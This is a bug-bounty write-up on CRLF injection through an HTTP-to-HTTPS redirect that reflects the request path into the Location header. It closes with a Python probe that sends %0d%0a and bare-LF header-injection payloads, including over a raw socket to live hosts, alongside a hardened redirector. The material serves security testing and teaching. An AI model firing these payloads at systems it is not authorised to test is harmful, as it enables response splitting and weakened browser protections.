Write-up

CRLF in H1 program $300 bounty

Bug Name :- CRLF-I
Bug Priority :- Low
Bounty :- $250 + $50
      

Description

In a CRLF injection attack, the attacker inserts carriage return (CR, %0d) and line feed (LF, %0a) characters into user input so that the server, the web application, or the user's browser treats one object as terminated and a new one as started. CRLF sequences are not malicious in themselves, but when user input is reflected unfiltered into a context that uses them as delimiters, such as HTTP response headers, they enable attacks like HTTP response splitting.

CRLF injection in web applications

In web applications, the impact of a CRLF injection depends on what the application does with the injected data. Consequences range from information disclosure to, in the worst case, code execution, so it is a vulnerability with direct impact on web application security even though it has never appeared in the OWASP Top 10 as a category of its own. The classic targets are HTTP response headers (header injection and response splitting) and log files, where an injected line break lets an attacker forge entries that a reviewer reading the log in an admin panel cannot tell from genuine ones.

Impact

The impact of a CRLF injection varies with the context, but once an attacker controls part of the response it typically covers everything that cross-site scripting and information disclosure would allow. Injected headers can also switch off browser-side protections, for example an X-XSS-Protection: 0 header to disable the XSS filter or a permissive Access-Control-Allow-Origin header to relax the same-origin policy, paving the way for further attacks.

Hints

Always try requesting the target over plain HTTP instead of HTTPS: most servers answer with a redirect to HTTPS and build the Location response header from the requested URL, so a CR/LF sequence in the path may be reflected straight into the response headers. For me, I created an automated script to identify this, which is available on my GitHub.
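The mechanism from the description and the HTTP-to-HTTPS redirect trick from the hint, as an added example that is not part of the original write-up and not the author's GitHub script. It simulates a redirector that reflects the requested path into the Location header, places a hardened version beside it, and runs a small probe against both; the host example.com, the header name X-CRLF-Probe and the token value are assumptions chosen for the illustration.

```python
"""Added example: probing an HTTP->HTTPS redirector for CRLF injection.

Not the author's script and not code from the original write-up.
Assumptions: the target reflects the requested path into the Location
header of its redirect; https://example.com is a stand-in host.
"""
import socket
from urllib.parse import unquote

MARKER = "x-crlf-probe"  # header name the probe tries to inject (assumed name)
PAYLOADS = [
    "/%0d%0aX-CRLF-Probe:%20{token}",  # CR LF, the canonical header terminator
    "/%0aX-CRLF-Probe:%20{token}",     # bare LF, which lenient parsers also honour
]


def vulnerable_redirect(raw_path: str) -> bytes:
    """Constructed stand-in for a redirector that decodes the requested path and
    reflects it unfiltered into Location (the behaviour the hint relies on)."""
    target = "https://example.com" + unquote(raw_path, encoding="latin-1")
    return (
        "HTTP/1.1 301 Moved Permanently\r\n"
        f"Location: {target}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def hardened_redirect(raw_path: str) -> bytes:
    """Same redirector, but it refuses any control character in the decoded
    path before the value reaches a header. Most modern frameworks apply the
    same check when a header value is set."""
    decoded = unquote(raw_path, encoding="latin-1")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return vulnerable_redirect(raw_path)  # safe: the path has been validated


def parse_response(raw: bytes):
    """Parse a raw HTTP response the way a lenient client does: a bare LF ends a
    header line too, and CRLF CRLF ends the header block."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = [line.rstrip(b"\r") for line in head.split(b"\n")]
    status = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower().decode("latin-1"),
                            value.strip().decode("latin-1")))
    return status, headers, body


def scan(transport, token: str = "a7f3c9") -> list:
    """Send each payload through `transport` (a callable path -> raw response
    bytes) and report the ones whose probe header came back as a header of its
    own, i.e. the server split the response at the injected line break."""
    findings = []
    for template in PAYLOADS:
        path = template.format(token=token)
        status, headers, _ = parse_response(transport(path))
        if (MARKER, token) in headers:
            findings.append({"path": path, "status": status})
    return findings


def socket_transport(host: str, port: int = 80, timeout: float = 5.0):
    """Transport for a live target: a raw GET over plain HTTP (port 80), which
    is where the HTTPS redirect is issued. A raw socket sends the request line
    exactly as written, so nothing re-encodes or rejects the payload."""
    def send(raw_path: str) -> bytes:
        request = (
            f"GET {raw_path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
        ).encode("ascii")
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            chunks = []
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        return b"".join(chunks)
    return send


if __name__ == "__main__":
    print("vulnerable:", scan(vulnerable_redirect))   # two findings
    print("hardened:  ", scan(hardened_redirect))     # []
    # Live use (not run here): scan(socket_transport("target.example"))
```

Against a live target, pass socket_transport("host") as the transport. A finding is only real when the probe header shows up as a header of its own, not merely as text inside the Location value, so check the raw bytes before reporting; a bare-LF split is honoured only by some parsers, which is why the two payload variants are tried separately.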